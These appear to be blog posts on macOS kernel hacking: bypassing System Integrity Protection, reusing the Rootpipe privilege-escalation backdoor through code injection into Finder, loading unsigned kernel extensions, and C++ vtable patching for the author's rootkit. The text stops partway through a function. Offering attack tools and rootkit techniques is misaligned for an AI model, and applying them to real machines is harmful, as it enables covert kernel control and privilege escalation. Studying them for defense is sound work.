tweakbsd.org

Mac OS X development for Geeks

El Capitan System Integrity Protection


I was very excited when I heard rumours about Apple’s new security feature called rootless. On Monday at WWDC, Apple finally showed off the new OS X release named “El Capitan” (yeah, the name sucks) and made it available for download to all Apple developers. So I got my hands on it, and here is a short description of what rootless is, what it is supposed to protect, and how easy it is to break.

What is rootless?

In general, it is the internal term for what end users will now know as System Integrity Protection. It is meant to protect the system from modifications both on disk and at runtime. The name is derived from the fact that even the almighty root account is now restricted by it.

What is protected?

In short, primarily everything under the /System folder as well as /usr is protected. Furthermore, all processes that carry an Apple private entitlement are protected from code injection. As already mentioned, even root can’t do these things anymore.

How does it work ?

I won’t go into all the technical details here, as I don’t know them yet and they may still be subject to change. Furthermore, the NDA I signed with Apple would prevent me from telling you. I’m not even sure whether it’s okay that I’m writing about “El Capitan” at all.

So back to the topic how rootless works. It works by applying a sandbox profile to every process on the system. Thus it depends on Sandbox.kext which is a TrustedBSD module. TrustedBSD is the MAC framework and provides many hooks, sprinkled all over the kernel, that can be implemented by a module to allow or deny an action.

How to break it?

That’s really simple, and right now there are many ways to do it, which is a bad thing from a security point of view. The reason is that root is still allowed to load code into the kernel through Kexts, which gives us full control over the system and renders rootless useless. Even Kext signing is no hurdle: my latest tests have shown that all publicly known techniques to load unsigned Kexts still work on El Capitan.

For example, one way to disable rootless’ protection against code injection into system processes would be to load a Kext and hook

mac_process.c (XNU)

int
mac_proc_check_get_task_name(struct ucred *cred, struct proc *p)
{
    int error;

    MAC_CHECK(proc_check_get_task_name, cred, p);

    return (error);
}

For the experts among you: yes, I know, this would not only affect rootless but all TrustedBSD modules.

Rootpipe Backdoor Antifix


With the latest release of OS X Yosemite, Apple fixed the Rootpipe “hidden backdoor API”, as it was called by its discloser.

This backdoor is not a backdoor in the usual sense; it is a design mess. Which is, regarding security, Apple’s most special ability, as I like to call it. It consists of 2 components: the private SystemAdministration.framework and an XPCService called writeconfig that is included in this framework. The framework calls down to the XPCService, which runs with root privileges so it can, as the name suggests, write configuration data to sensitive locations.

The XPCService uses the NSXPCConnection Objective-C API for XPC communication. Up to and including OS X 10.10.2, Apple did not deem it necessary to implement any access controls in the XPCService, so anybody who knew about it could use it at will.

But with the recent release of OS X 10.10.3, Apple fixes the backdoor, or rather access to the backdoor, by checking whether a task connecting to the XPCService has the “com.apple.private.writeconfig” entitlement. See the SecTaskCopyValueForEntitlement() API for more information about it.

How to fix Apple’s fix

Over the last few days I was thinking about whether there is still a way to use the rootpipe backdoor. And of course there is, even more than one. Since we don’t want to write to files on disk and invalidate code signatures, we need another route. We cannot get the entitlement ourselves. We just need an app that has it and that we can easily mess with. There are many binaries on OS X 10.10.3 that have this entitlement; for a list, have a look at the code fg! released together with his latest blog post. That post is about fixing the rootpipe backdoor on older OS X versions, because, as usual, Apple did not backport its fix to Mavericks or earlier. But back to our plan: as the victim app I chose Finder, as it is constantly running on every machine while a user is logged in.

Next we need a way to inject code into Finder. There are at least 2 widely known ways to achieve this. One would be to use the DYLD_INSERT_LIBRARIES environment variable, but that would mean restarting Finder. So I chose to inject code into the running Finder by using Mach functionality, namely thread_create() and thread_set_state(). Lucky me, I had already written a library for exactly that purpose! You can access its source code as usual from the Subversion Repository if you like. Another example of code injection on OS X can be found on the website for the book Mac OS X and iOS Internals: To the Apple’s Core by Jonathan Levin.

Putting the antifix together

Okay, we need a dylib that will run inside the Finder task and a tool that injects it. No sooner said than done: I put something together to fix Apple’s fix. To make it even more convenient, the tool has the injectable dylib embedded in its __DATA section, so it works entirely on its own.

The injected dylib registers an NSDistributedNotificationCenter observer that listens for notifications with the name “com.apple.rootpipe”. When one is received, it decodes the notification, performs the rootpipe for us, and reports the status back by posting another distributed notification under a different name.

You can try it yourself and download a compiled binary version of the tool. As usual, run the tool without arguments to get help on how to use it.

Furthermore the full source code of the tool can be found here and the source code for the dylib is of course also available.

CAUTION: You are responsible for what you do with this dangerous piece of software!!

IMPORTANT UPDATE

I totally missed one point, which is really embarrassing now: my OS X 10.10.3 machine runs a slightly modified authorization database, so task_for_pid() does not prompt the user for a password if they are a member of the admin group. That is not the case on a default OS X installation, so my antifix does not work silently there. I will have to put more work into this. Check back soon, I’m on it.

New Ways to Break Signed Kernel Extensions


I was very excited when I heard that I could get my hands on some code from fg! after his presentation of BadXNU, a rotten apple! at SyScan 2015 in Singapore. There he presented 2 interesting techniques to bypass mandatory code signing for Kexts on OS X Yosemite. You can get the slides and full source code from his blog post about it.

Two techniques to access kernel memory

1. The first technique is nothing special at all. It uses the kernel’s task Mach port to read and write kernel memory. To get the port, it abuses the well-known processor_set_tasks() vulnerability. Nobody really knows why Apple fixed it for iOS but left it intact on OS X.

2. The second technique is more interesting, but in parts also more complex. It abuses a Kext from Apple, namely AppleHWAccess.kext. This Kext allows reading and writing every physical memory address, which is awesome. You can read the original thread in a famous Hackintosh forum from the person who discovered how to use the Kext’s IOUserClient class from user-space. But as I said, this technique is a bit more complex. As you can imagine, read and write access to every single byte of physical memory is great, but the kernel is a Mach task, and tasks work with virtual memory. So we need to translate between physical and virtual addresses ourselves, which is not that hard. But wait: we can read and write, so the real question is where do we write our Kext to? We have no way to allocate memory. So we need a physical memory range that is large enough for a Kext, belongs to the kernel task’s virtual address space, and is executable. That’s not easy. If you want to know how to do this, have a look at fg!’s code, which can be downloaded from the above-mentioned blog post. If you need the password for the archive, drop me an e-mail or, better, ask fg! himself.

The next question is: how do we start execution of a Kext after we have managed to write it into the kernel’s memory and have linked all external symbols?

Get your kernel code executed

TrustedBSD to the rescue, aka the MAC Framework (Mandatory Access Controls). We can install a new MAC policy entry. A policy provides all kinds of hooks, spread all over the kernel, that are called automatically when a user-space application issues a syscall or Mach trap. We just have to point one hook’s function pointer at the entry point address in kernel memory where we copied our Kext to. Our code then gets executed when the hook fires, and afterwards we simply remove the new MAC policy entry. Easy.

Objective-C implementation

Since I don’t really like plain C code, I wrote a tool that reimplements everything from fg!’s first technique in Objective-C. As a little bonus I implemented unsigning of Mach-O binaries, so you can first remove the code signature of a binary and then load it into the kernel. It was tested on Mavericks 10.9.5 and Yosemite. If you find any bugs, please report them. You can download a code-signed binary version of the tool here. Just run it without arguments to get help on how to use it. The full source code is also available; have a look at the Subversion repository if you like. The most interesting file is Kernel.m, and the MTKernel and MTKernelMachOLoader classes are the ones you should look at.

I have also uploaded a new version of my kexttool which can also load unsigned Kexts by using the kext_request() API.

Breaking Yosemite Signed Kernel Extensions


It’s been a while since I wrote my last blog post and since then a new version of OS X was released, OS X 10.10 Yosemite.

And with this release a new era for kernel-mode rootkits has come: from now on only signed kernel extensions can be loaded. True, there is an exception, the kext-dev-mode=1 boot argument, which disables signature validation for all Kexts. But that boot argument is not set on non-developer machines.

2 Ways to break signed Kernel Extensions

There are at least 2 ways I know to solve the problem we have. One way would be fg!’s solution, by patching the kextd binary in memory.

But I prefer a much more elegant way that is much more powerful. Simply write my own kextload program.

So, how does kextload work?

It is in short a tool written around a MIG (Mach Interface Generator) routine which translates to this declaration in C:

host_priv.defs (XNU)
kern_return_t kext_request(
        host_priv_t                             hostPriv,
        /* in only */  uint32_t                 clientLogSpec,
        /* in only */  vm_offset_t              requestIn,
        /* in only */  mach_msg_type_number_t   requestLengthIn,
        /* out only */ vm_offset_t            * responseOut,
        /* out only */ mach_msg_type_number_t * responseLengthOut,
        /* out only */ vm_offset_t            * logDataOut,
        /* out only */ mach_msg_type_number_t * logDataLengthOut,
        /* out only */ kern_return_t          * op_result);

But to load a kernel extension there is much more to understand than just this function. So I decided to start by looking at the source of kextload itself in the kext_tools package. Surprisingly there is no reference to kext_request() at all. After more investigation I found out that kextload uses the OSKext user-space API from IOKitUser. So OSKext.c was where all my research ended. It is not that hard to understand the underlying mechanism.

The functions in OSKext.c call down to kext_request(), which in turn calls methods of the OSKext class. That class is technically part of XNU but specifically belongs to libkern, so feel free to have a look at OSKext.cpp. Once you have a good knowledge of the MKEXT 2 file format, you’re good to go and can write your own kextload program. Which is exactly what I did over the last 3 days.

I was able to roll my own Kext Tool that can load unsigned Kexts on both Mavericks and, more importantly, Yosemite without any user warning. Kexts don’t need valid signatures, they don’t even have to be owned by root as usual, and you can choose any bundle identifier you like to appear under kextstat.

Where to find Kext Tool?

It is part of Heroine, my Anti-Rootkit Rootkit project. So the code can be found in my Subversion Repository here. Or if you prefer you can download a precompiled binary version.

But be aware it can only start Generic Kexts, you can load IOKit drivers, but the matching process will not be started so it will be of no use in most cases.

C++ Vtable Patching


I am proud to announce that Heroine, my future C++ Anti-Rootkit Rootkit, is most probably the first C++ Mac OS X rootkit that supports running in Zombie Mode! If you need more information on Zombie Mode, please read this blog.

The last time I wrote about Zombie Mode, Heroine only ran correctly with C++ classes that have no methods declared as virtual. This of course led to memory leaks, since nearly all classes in Heroine are derived from BaseClass (aka Object), which must have a virtual destructor because all instances are destroyed by code like this:

BaseClass.h (Repository)
class BaseClass
{
// These are simplified methods 
// just to reflect what's basically going on
public:

    // Memory management interface methods
    
    virtual void retain() 
    { 
        ++m_retainCount; 
    }
    
    virtual void release()
    { 
        if( (--m_retainCount) <= 0 )
            free();
    }
    
protected:
    virtual ~BaseClass() { /* clean up */ }
    
    virtual void free()
    { 
        delete this; // That's why destructor must be virtual
    }
private:
    int m_retainCount;
};

Why are virtual methods in Zombie Mode not working?

This was the question I asked myself. Why are virtual methods not working in Zombie Mode?

At first I did some research on the C++ ABI used for 64-bit Mac OS X Kexts, because the problem had to be related to C++, since all C code worked fine in Zombie Mode. I found out that the Itanium C++ ABI is used for the Kext I am developing. Google is my friend, and so I ended up reading many blogs, documents and papers about the Itanium C++ ABI. The internet offers a lot of information about it. Far too much, and I did not want to study this ABI completely.

So I asked Google again, but this time more directly. The query was exactly C++ Virtual Method ABI Itanium. The first hit was this page on Github, which is a fine document about the Itanium C++ ABI. I looked for virtual methods and functions and read Virtual Function Calling Conventions down to and including the Caller paragraph, which explains that all virtual method calls use a Virtual Method Table to get the address of the function to call. That’s it. That must be the problem, I thought.

Something must be wrong with copying this table. It has to be that, since I had checked the memory of the Kext copied to the Zombie memory area, including all the CALL, JMP and LEA instructions in there that had been patched, and I could not find a bug.

How to find the address of a C++ Virtual Method Table?

So where in memory is this table located, and how do we get its address? What I knew was that all calls to virtual member functions go through a table of pointers. So to obtain the address of a virtual member function we first need the address of the table and then the offset of that method in the table. Sounds easy, but at this point I was stuck and did not really know what to do next. So while thinking I tried some stupid code, more or less for fun:



void* addressOfVirtualMethod = (void*)&BaseClass::release;

typedef void (*function_pointer_t)();

function_pointer_t addressOfNonVirtualMethod = (function_pointer_t)&BaseClass::getInstanceNumer;

Neither of these 2 assignments worked, with or without a cast. Clang does not like them, and neither does GCC. But wait! I know a way to make those assignments work. It’s code I have stolen from, or better said was given as a gift by, Apple’s libkern: the OSMemberFunctionCast() macro. I use it a lot in I/O Kit drivers for using member functions as callbacks. Heroine also has this macro, renamed to MemberFunctionCast() and adapted to work with my own BaseClass instead of libkern’s OSMetaClass.

I at once reviewed the code I wrote when I stole the macro:

BaseClass.h (Repository)

class BaseClass
{
public:
    typedef void (*_ptf_t)(void);

    // Pointer-To-Member-Function 2 Pointer-To-Function
    inline static _ptf_t
    _ptmf2ptf(const BaseClass *self, void (BaseClass::*func)(void))
    {
        union {
            void (BaseClass::*fIn)(void);
            uintptr_t fVTOffset;
            _ptf_t fPFN;
        } map;
        
        map.fIn = func;
        
        if (map.fVTOffset & 1) {
            // virtual
            union {
                const BaseClass *fObj;
                _ptf_t **vtablep;
            } u;
            u.fObj = self;
            
            // Virtual member function so dereference vtable
            return *(_ptf_t *)(((uintptr_t)*u.vtablep) + map.fVTOffset - 1);
        } else {
            // Not virtual, i.e. plain member func
            return map.fPFN;
        }
    }
};

#define MemberFunctionCast(cptrtype, self, func) \
(cptrtype) BaseClass::                           \
_ptmf2ptf(self, (void (BaseClass::*)(void)) func)

Haha! This code shows exactly how to find the Virtual Method Table address and, from the table, the entry for the method you want to use. Additionally it MUST BE fool-proof and stable, since Apple uses it in their own I/O Kit code, which is also written in C++.

Now we have a way to get the address of a Virtual Method Table, or better said of one entry in the table, and only for a specific instance. This is really an imperfect solution, because patching would require creating instances of all classes and passing all virtual methods one by one to a modified version of the MemberFunctionCast() macro, which would be a lot of code. And each time we change a class by adding or removing virtual methods, we must adapt the code. Bad luck again, but it would at least be a way to get C++ virtual methods working in Zombie Mode.

I did not like this solution and it was not good enough for me to start with an implementation. I REALLY WANT a way to get the address of the Virtual Method Table for a specific class without previously creating an instance. Additionally I do not want to specify each virtual method I want to patch explicitly, I WANT a dynamic or self-adapting solution.

So I turned my brain on again and told myself to investigate further; I needed more information about Virtual Method Tables to be able to find a satisfying solution. This time I did not want to ask the internet again, as I was sure I would not find what I needed without reading another 200 websites and blog entries. I was already fed up with reading theory about Virtual Method Tables.

So I said to myself, come on, you must have some ideas. The next idea I had was to take a close look at the memory of one Virtual Method Table entry that I obtained using a slightly modified version of the MemberFunctionCast() macro. I admit it was not a brilliant idea, but it was good that I did it. The address was nothing special and belonged to my Kext. You can find out real Kext addresses with this version of kextstat from fg!, which shows the correct addresses including the KASLR slide. To obtain the address of the member function, just dereference this address and we get another pointer. What made me think was that the method pointer was an absolute address of the kernel memory where the method was located. Don’t we use RIP-relative addressing on x86_64? And where the hell did the kernel get the absolute address from? My Kext is loaded dynamically, so this pointer is different each time.

There must be a mechanism that modifies or sets up the Virtual Method Table entries when the Kext is loaded. How are Kexts loaded? By the kextload executable, but it is not the one that does the heavy lifting; it is just the user-space side of the bridge. The heavy lifting is done by KXLD, the kernel linker. I downloaded a copy of its source code and soon looked at kxld_vtable.c, but it didn’t help me. I was only a short step away from giving up and starting to implement the solution based on the modified MemberFunctionCast() macro.

I looked at the memory again. I had the address of one Virtual Method Table entry but did not know what I could get from it. Wait, I can get the offset where it is located in the Kext executable file on disk by subtracting the Kext Base/Load Address from it. As soon as I had calculated the offset, I started MachOView and looked at this offset in the file:

[Screenshot: MachOView]

Not very meaningful. But at least I now know that Virtual Method Tables are in the __DATA segment and section __const.

Maybe the Hopper Disassembler can interpret what data is at this file offset. This is what I saw:

[Screenshot: Hopper Disassembler (captioned “MachOView” in the original)]

Yeah. Hopper knows that it is a Virtual Method Table and shows a symbol name at this offset. So Virtual Method Tables have their own symbols. Great news: if we have a symbol, we can resolve its address. The mangling applied to the symbol is very simple: the prefix __ZTV, followed by a number that must be the length of the class name, followed by the class name itself.
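To make the rule concrete, here is a minimal user-space sketch of it. It is not code from Heroine: the function name vtableSymbolFor is made up for this illustration, it uses std::string (which is not available in a Kext), and it only covers plain class names, optionally qualified with "::", without templates or the std namespace. For qualified names the Itanium scheme wraps the length-prefixed parts in N...E.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Hypothetical helper: builds the Mach-O vtable symbol for a plain class name
// such as "BaseClass" or "Outer::Inner". Templates and namespace std are NOT handled.
std::string vtableSymbolFor(const std::string& qualifiedName)
{
    assert(!qualifiedName.empty());

    std::string encoded;
    std::size_t parts = 0;
    std::size_t start = 0;

    while (true) {
        // Split at the scope operator; each part becomes <length><name>.
        const std::size_t sep = qualifiedName.find("::", start);
        const std::string part = (sep == std::string::npos)
            ? qualifiedName.substr(start)
            : qualifiedName.substr(start, sep - start);

        encoded += std::to_string(part.size()) + part;
        ++parts;

        if (sep == std::string::npos)
            break;
        start = sep + 2;
    }

    // Qualified (nested) names are wrapped in N ... E.
    if (parts > 1)
        encoded = "N" + encoded + "E";

    // "_ZTV" marks a vtable; Mach-O adds one more leading underscore.
    return "__ZTV" + encoded;
}
```

Under these assumptions, vtableSymbolFor("BaseClass") yields __ZTV9BaseClass and vtableSymbolFor("Runtime::Foo") yields __ZTVN7Runtime3FooE.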

Now I’m happy with all the information I have gathered so far, and I have come up with an idea for how to implement code that gets the address of a Virtual Method Table.

Best solution to get C++ Virtual Method Table addresses!!

Necessary steps.

  1. A function to generate the mangled vtable symbol for a class
  2. A function to resolve that symbol

The first function is really simple. Thanks to the mangling scheme that is used by Clang. Here is my implementation:

BaseClass.cpp (Repository)

// Name mangling for vtable symbol resolving, NOT THREAD-SAFE
const char* Runtime::vtableSymbolWithClass(const char* className)
{
    #ifndef DEBUG
    if(!className || strlen(className) >= 128)
        return NULL;
    #endif //DEBUG
    
    const size_t retBufferSize = 128; // FIXME: Use _MALLOC()
    static char retBuffer[retBufferSize];
    bzero(retBuffer, retBufferSize);
    snprintf(retBuffer, retBufferSize - 1, "__ZTV%lu%s", strlen(className), className);
    return retBuffer;
}

const char* Runtime::vtableSymbolWithNestedClass(const char* className, const char* classNamespace)
{
    #ifndef DEBUG
    if(!className || !classNamespace || strlen(className) >= 128)
        return NULL;
    #endif //DEBUG
    
    const size_t retBufferSize = 128; // should be large enough
    static char retBuffer[retBufferSize];
    bzero(retBuffer, retBufferSize);
    snprintf(retBuffer, retBufferSize - 1, "__ZTVN%lu%s%lu%sE", strlen(classNamespace), classNamespace, strlen(className), className);
    
    return retBuffer;
}

The functions could be enhanced by parsing the class names and detecting the scope operator ::, but Heroine only has very few nested classes and none deeper than 1 level (a class inside another class). The second function is not as easy to implement. As we already know from the code that resolves symbols in mach_kernel, we cannot resolve symbols from the in-memory representation of a Kext, or more precisely of a Mach-O binary, since the __LINKEDIT segment is not available there. So it’s necessary to read the Kext executable file from disk to resolve its symbols. As a result, my implementation is nearly the same as the one I use for symbols in mach_kernel. Here it is:

MachO.cpp (Repository)

SymbolRefList* MachO::resolveAllSymbolsForKextAndGetConstSection(const char* filepath, Section64** outSection)
{
    SymbolRefList* list = NULL;
    Vnode* vnode = NULL;
    void* kextHeader = NULL;
    void* linkeditBuffer = NULL;
    
    try
    {
        vnode = Vnode::withPath(filepath);
        if(!vnode)
            throw("cannot read from disk");
        
        list = SymbolRefList::list();
        if(!list)
            throw("cannot allocate a List");
        
        kextHeader = _MALLOC(PAGE_SIZE_64, M_TEMP, M_WAITOK);
        if(!vnode->read(kextHeader, 0, PAGE_SIZE_64))
            throw("cannot read kext mach header");            
        
        
        struct mach_header_64* mh = (struct mach_header_64*)kextHeader;
        if(mh->filetype != MH_KEXT_BUNDLE)
            throw("file is not a kext");
        
        char* load_cmd_addr = (char*)MachO::Header64::get1stLoadCommand(mh);
        
        /*
         struct segment_command_64* segmentCmdTEXT = NULL;
         bool foundTEXT = false;
         */
        
         struct segment_command_64* segmentCmdDATA = NULL;
         bool foundDATA = false;
         
        
        struct segment_command_64* segmentCmdLINKEDIT = NULL;
        bool foundLINKEDIT = false;
        
        struct symtab_command* symtabCmd = NULL;
        bool foundSYMTAB = false;
        
        bool foundEverything = false;
        bool error = false;
        for(uint32_t i = 0; i < mh->ncmds && !foundEverything; i++)
        {
            
            struct load_command* loadCmd = (struct load_command*)load_cmd_addr;
            
            if(loadCmd->cmd == LC_SEGMENT_64)
            {
                struct segment_command_64* segmentCmd = (struct segment_command_64*)loadCmd;
                const char* segment_name =  segmentCmd->segname;  //m_loadCommand->getName();
                
                // use this one to retrieve the original vm address of __TEXT so we can compute aslr slide
                /*if (strncmp(segment_name, SEG_TEXT, 16) == 0)
                 {
                 segmentCmdTEXT = segmentCmd;
                 foundTEXT = true;
                 
                 #ifdef DEBUG
                 printf("[DEBUG] Found __TEXT segment at %p!\n", (void*)segmentCmd->vmaddr);
                 #endif //DEBUG
                 }
                 else */if(strncmp(segment_name, SEG_LINKEDIT, 16) == 0)
                 {
                     segmentCmdLINKEDIT = segmentCmd;
                     foundLINKEDIT = true;
                     
                     #ifdef DEBUG
                     printf("[DEBUG] Found __LINKEDIT segment at %p!\n", (void*)segmentCmd->vmaddr);
                     #endif //DEBUG
                 }
                
                 else if(outSection && strncmp(segment_name, SEG_DATA, 16) == 0)
                 {
                     segmentCmdDATA = segmentCmd;
                     foundDATA = true;
                     
                 
                     char *section_addr = load_cmd_addr + sizeof(struct segment_command_64);
                     struct section_64 *section_cmd = NULL;
                     
                     // iterate thru all sections
                     for(uint32_t x = 0; x < segmentCmdDATA->nsects; x++)
                     {
                         section_cmd = (struct section_64*)section_addr;
                         if(strncmp(section_cmd->sectname, "__const", 16) == 0)
                         {
                             
                             #ifdef DEBUG
                             printf("[DEBUG] Found __DATA,__const section at %p!\n", (void*)section_cmd->addr);
                             #endif //DEBUG
                             
                             MachO::Section64* section =  MachO::Section64::alloc();
                             if(!section)
                             {
                                 error = true;
                                 break;
                             }
                             
                             void* section_copy = _MALLOC(sizeof(struct section_64), M_TEMP, M_WAITOK);
                             memcpy(section_copy, section_addr, sizeof(struct section_64));
                             *section = (struct section_64*)section_copy;
                             // FIXME: Caller must _FREE() it
                             
                             *outSection = section;
                             
                             break;
                         }
                         section_addr += sizeof(struct section_64);

                     }
                     if(error)
                     {
                         break;
                     }
                 
                     #ifdef DEBUG
                     printf("[DEBUG] Found __DATA segment at %p!\n", (void*)segmentCmd->vmaddr);
                     #endif //DEBUG
                 }
            }
            else if(loadCmd->cmd == LC_SYMTAB) //if (m_loadCommand->isSymtabCommand())
            {
                symtabCmd = (struct symtab_command*)loadCmd;                        
                foundSYMTAB = true;
                
                #ifdef DEBUG
                printf("[DEBUG] Found SYMTAB at %p!\n", (void*)loadCmd);
                #endif //DEBUG
            }
            foundEverything = (foundLINKEDIT && foundSYMTAB); //(foundTEXT && foundLINKEDIT && foundDATA && foundSYMTAB);
            
            load_cmd_addr += loadCmd->cmdsize;
        }
        
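        if(error)
            throw("error while iterating through segments/sections");
        
        // Both load commands are dereferenced below, so bail out if either is missing
        if(!foundLINKEDIT || !foundSYMTAB)
            throw("kext has no __LINKEDIT segment or no LC_SYMTAB command");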
        
        
        linkeditBuffer = _MALLOC(segmentCmdLINKEDIT->filesize, M_TEMP, M_WAITOK);
        if(!linkeditBuffer)
            throw("cannot allocate __LINKEDIT buffer");
        
        
        
        if(!vnode->read(linkeditBuffer, segmentCmdLINKEDIT->fileoff, segmentCmdLINKEDIT->filesize))
            throw("cannot read __LINKEDIT segment");
        
        
        uint64_t symbol_offset = symtabCmd->symoff - segmentCmdLINKEDIT->fileoff;
        uint64_t string_offset = symtabCmd->stroff - segmentCmdLINKEDIT->fileoff;
        
        SymbolRefNode* lastNode = NULL;
        
        struct nlist_64 *nlist = NULL;
        for (uint32_t i = 0; i < symtabCmd->nsyms; i++)
        {   
            nlist = (struct nlist_64*)((uint64_t)linkeditBuffer + symbol_offset + i * sizeof(struct nlist_64));
            char *symbol_name = (char*)((uint64_t)linkeditBuffer + string_offset + nlist->n_un.n_strx);
            
            SymbolRefNode* node = SymbolRefNode::withNameAndNList(symbol_name, nlist);
            if(!node)
            {
                error = true;
                break;
            }
            
            if(lastNode)
                list->insertAfter(node, lastNode);
            else
                list->insertHead(node);
            
            
            lastNode = node;
            node->release();
            
        }
        if(error)
            throw("error allocating SymbolRefNode's");
        
    }
    catch(const char* error)
    {
        #ifdef DEBUG
        printf("MachO::%s() %s\n", __FUNCTION__, error);
        #endif //DEBUG
        
        SafeReleaseNULL(list);
    }
    
    _SafeFree(kextHeader, M_TEMP);
    _SafeFree(linkeditBuffer, M_TEMP);    
    SafeRelease(vnode);
    
    return list;
}



You may now ask why I resolve all symbols and not only the ones for the Virtual Method Tables. The reason is that the only way to get the size of a Virtual Method Table is to get the address of the symbol that follows the table. Even worse, a table symbol can be the very last symbol in a Mach-O binary, and then the only way to know where it ends is to take the last memory address of the section that contains the table. That is why the method has a second argument, which gives the caller a copy of the struct section_64 corresponding to segment __DATA and section __const. This is the section where all Virtual Method Tables are found, or at least where I encountered them. Maybe this assumption is wrong, but for now I consider it safe enough, since it holds for the version of my Kext that clang builds. For later RELEASE builds of Heroine I will fix that assumption, check which sections the Virtual Method Tables are in, and give the caller a copy of each.
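The size rule can be sketched in a few lines of user-space C++. This is only an illustration under stated assumptions, not Heroine's code: the Symbol struct and the symbolSize function are hypothetical stand-ins for the SymbolRefList machinery, and sectionEnd is assumed to be the section's addr + size taken from struct section_64.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, simplified stand-in for a resolved symbol (name + address).
struct Symbol {
    std::string name;
    uint64_t    address;
};

// Returns the size in bytes of the symbol called `name`, or 0 if it is not found.
// The size is the distance to the next higher symbol address, capped at
// `sectionEnd` (the first address after the section that contains the symbol).
uint64_t symbolSize(std::vector<Symbol> symbols,
                    const std::string& name,
                    uint64_t sectionEnd)
{
    // Sort by address so that "the following symbol" is well defined.
    std::sort(symbols.begin(), symbols.end(),
              [](const Symbol& a, const Symbol& b) { return a.address < b.address; });

    for (std::size_t i = 0; i < symbols.size(); ++i) {
        if (symbols[i].name != name)
            continue;

        const uint64_t start = symbols[i].address;
        assert(start < sectionEnd);

        // Default: the symbol is the last one, so it runs to the section end.
        uint64_t end = sectionEnd;
        for (std::size_t j = i + 1; j < symbols.size(); ++j) {
            if (symbols[j].address > start) {
                // The next symbol may live in a later section; never exceed the end.
                end = std::min(symbols[j].address, sectionEnd);
                break;
            }
        }
        return end - start;
    }
    return 0;
}
```

With symbols at 0x1000 and 0x1040 and a section ending at 0x1080, both come out as 0x40 bytes: the first is bounded by its successor, the second by the end of the section.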

Finally, get all Virtual Method Table addresses and patch them!

It was a long journey to get here; I think it took me somewhere between a week and 10 days. But it was worth all the trouble, as we’re now able to resolve the address of any Virtual Method Table we want. Now we need a way to patch all the tables, or rather their entries, so we can use virtual methods in Zombie Mode.

As we learned already, all entries are absolute pointers to the memory where the member functions were when the Kext was loaded. We must now calculate where those functions are in the Zombie memory. That’s easy.

We subtract the Kext base/load address from the address an entry points to. That gives us the offset, or call it distance, for the entry. Now add it to the address of the zombie memory and, voilà, simply write this value to the entry’s memory location. Nothing special, since the zombie memory was just _MALLOC()’ed and is writable.
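The arithmetic can be sketched as follows. This is a minimal user-space illustration, not the cxx_patch_vtable() implementation: `rebaseSlots` and its parameters are hypothetical, and skipping slots that do not point into the original image is an assumption made here so that values such as a zero offset-to-top or pointers to code outside the Kext stay untouched.

```cpp
#include <cstddef>
#include <cstdint>

// Rebase every slot that points into the original image
// [kextBase, kextBase + kextSize) so it points to the same offset inside
// the copy starting at zombieBase. Returns the number of rewritten slots.
size_t rebaseSlots(uint64_t* slots, size_t count,
                   uint64_t kextBase, uint64_t kextSize, uint64_t zombieBase) {
    size_t patched = 0;
    for (size_t i = 0; i < count; ++i) {
        const uint64_t value = slots[i];
        // Leave anything alone that is not an address inside the old image.
        if (value < kextBase || value - kextBase >= kextSize)
            continue;
        const uint64_t distance = value - kextBase;  // offset within the Kext
        slots[i] = zombieBase + distance;            // same offset in the copy
        ++patched;
    }
    return patched;
}
```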

By the way, this is a terribly long article, so I’ll just finish it by showing you my implementation of C++ Virtual Method Table patching:

ZombieMode.cpp (Repository)

kern_return_t ZombieMode::cxx_patch_vtables() 
{
    kern_return_t kr = KERN_FAILURE;
    bool error = false;
    const char* kextPath = Kext::getExecutablePath();
    
    // Get all symbols of this kext and __const section
    MachO::Section64* sectionConst = NULL;
        
    SymbolRefList* symbolRefs = MachO::resolveAllSymbolsForKextAndGetConstSection(kextPath, &sectionConst); 
    // FIXME: Get section no. for better validation of symbols later
    if(!symbolRefs)
    {
        if(sectionConst)
        {
            _FREE(*sectionConst, M_TEMP); // We are responsible to _FREE() m_data
            sectionConst->release();
        }
        printf("[ZOMBIE] vtable patching failed, cannot get symbols from disk\n");
        return kr;
    }
    
    // Sort all symbols 
    symbolRefs->sort();
    
    if(!sectionConst)
    {
        printf("[ZOMBIE] vtable patching failed, cannot get __const section from disk\n");
        symbolRefs->release(); // do not leak the symbol list on this error path
        return kr;
    }
    
    // Calculate address where section __DATA,__const ends
    mach_vm_address_t addressOfSectionEnd =
    (mach_vm_address_t)sm_zombieMemory + sectionConst->getAddress() + sectionConst->getSize();
 
    printf("[ZOMBIE] End of __DATA,__const section: %p offset: %p\n", (void*)addressOfSectionEnd, (void*)(addressOfSectionEnd -(mach_vm_address_t)sm_zombieMemory));
    
    // 2) Iterate over all sm_classNames and sm_nestedClassNames
    
    // FIXME: Add sm_nestedClassNames to iteration
    
    const char* className = sm_classNames[0]; 
    for(int i = 0; className != NULL; className = sm_classNames[++i]) 
    {
        const char* vtableSymbolName = Runtime::vtableSymbolWithClass(className); //mangle C++ symbol

        List* vtableSymbolRefs = symbolRefs->findSymbol(vtableSymbolName);
        if(!vtableSymbolRefs)
        {
            error = true;
            break;
        }
        
        int numMustBePatched = 0;
        int numWasPatched = 0;
        SymbolRefNode* symbolRef = NULL;
        PointerNode* ptrNodeToSymbolRef; // !!! we get pointers to the real node's here
        List_foreach(vtableSymbolRefs, ptrNodeToSymbolRef)
        {
            symbolRef = (SymbolRefNode*)(void*)(*ptrNodeToSymbolRef); 
            struct nlist_64* nlist = symbolRef->getNList();
            
            // Symbol must have a section, or better must be in __DATA,__const
            // (N_EXT is not part of the N_TYPE mask, so external symbols match N_SECT as well)
            if( (nlist->n_type & N_TYPE) == N_SECT
               /*&& nlist->n_sect == sectionConst->getNumber()*/)
            {
                numMustBePatched++;
                
                uint64_t vtablePtrOffset = nlist->n_value;
             
                uint64_t* firstVirtualMethodPtr =
                (uint64_t*)(vtablePtrOffset + (mach_vm_address_t)sm_zombieMemory); //+ (2 * sizeof(void*)));
            
                // Walk forward until we reach the next symbol with a higher address

                SymbolRefNode* nextSymbolRef = (SymbolRefNode*)symbolRef->getNext();
                mach_vm_address_t nextSymbolOffset = 0;

                while(nextSymbolRef) // stop at the end of the list instead of dereferencing NULL
                {
                    mach_vm_address_t candidateOffset = nextSymbolRef->getAddress();
                    if(candidateOffset > vtablePtrOffset) // Okay got a higher address
                    {
                        nextSymbolOffset = candidateOffset;
                        break;
                    }
                    
                    nextSymbolRef = (SymbolRefNode*)nextSymbolRef->getNext();
                }
                
